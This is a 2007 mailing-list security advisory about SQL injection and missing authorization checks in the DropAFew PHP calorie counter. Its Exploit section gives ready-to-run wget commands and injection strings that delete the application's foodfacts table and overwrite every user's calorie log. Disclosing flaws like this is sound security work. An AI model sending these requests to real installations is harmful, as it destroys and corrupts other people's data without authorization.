[Full-disclosure] DropAFew - SQL injection and authorization issues

Type securityvulns
Reporter Securityvulns
Modified 2007-04-11T00:00:00



============================================ ||| Security Advisory AKLINK-SA-2007-002 ||| ||| CVE-2007-1363 (CVE candidate) ||| ||| CVE-2007-1364 (CVE candidate) ||| ============================================

DropAFew - Multiple vulnerabilities (SQL injection, authorization issue)

Date released: 10.04.2007 Date reported: 07.03.2007 $Revision: 1.1 $

by Alexander Klink Cynops GmbH a.klink@cynops.de https://www.cynops.de/advisories/CVE-2007-1363.txt (S/MIME signed: https://www.cynops.de/advisories/CVE-2007-1363-signed.txt) https://www.klink.name/security/aklink-sa-2007-002-dropafew-sqlinjection.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1363 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1364

Vendor: Chris Bratlien (Open Source) Product: DropAFew - a multi-user calorie counting program using PHP Website: http://www.dropafew.com Vulnerability: SQL injection attack, authorization issues Class: remote Status: patched Severity: moderate (database corruption and some information disclosure) Releases known to be affected: 0.2 Releases known NOT to be affected: 0.2.1

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Overview:

SQL injection is possible in different places which may lead to the deletion or corruption of the two most important database tables of the application. The vulnerability works without query stacking and with magic_quotes_gpw set to on.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Technical details:

An SQL injection is present in search.php and search-pda.php on the delete action. Setting id for example to "1 OR id > 0 --" deletes the foodfacts table completely. In editlogcal.php, the save action allows for an SQL injection into an UPDATE statement via the calories variable. Setting calories for example to "1000 WHERE id > 0 /*" corrupts the logcal database reducing it to the same entry (so it looks like everybody keeps eating the same thing again and again). In editlogcal.php, the id parameter is not checked for authorization, so it is possible for a user to see all logged calories for all users (without knowing who ate what, though). Furthermore, the links.php allows a user to add publicly viewable links to everyones link page, which a user can not remove, which might be a possibility for spam.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Exploit:

create new user

wget --save-cookies cookies --keep-session-cookies --post-data='username=exploit&password=1&password_confirm=1' http://[target]/calorie/newaccount2.php

delete foodfacts table

wget --load-cookies cookies --post-data='id=1%20OR%20id%20>%200--&action=del' http://[target]/calorie/search.php

make everyone have eaten 1000 strawberries, but hey, they were only 10

calories ...

wget --load-cookies cookies --post-data='action=save&id=1&date=20070101&time=23232323&vendor=nature&item=strawberries&portion=1000&calories=10+WHERE+id+%3E+0+%2F*' http://[target]/calorie/editlogcal.php

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Workaround:

Filtering the requests, restricting access to the application to trusted users only.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Communication:

  • 07.03.2007: Problem reported to author
  • 07.03.2007: Vendor replies and confirms the problem, presents ideas for a solution
  • 03.04.2007: Contacted vendor to check back on status
  • 03.04.2007: Vendor responds with updated version 0.2.1

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Solution:

Update to version 0.2.1 (http://dropafew.com/download/dropafew-0.2.1.zip)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Credit:

Alexander Klink, Cynops GmbH (discovery and exploit development) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (GNU/Linux)


-- Dipl.-Math. Alexander Klink | IT-Security Engineer | a.klink@cynops.de mobile: +49 (0)178 2121703 | Cynops GmbH | http://www.cynops.de ----------------------------+----------------------+--------------------- HRB 7833, Amtsgericht | USt-Id: DE 213094986 | Geschaftsfuhrer: Bad Homburg v. d. Hohe | | Martin Bartosch

Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/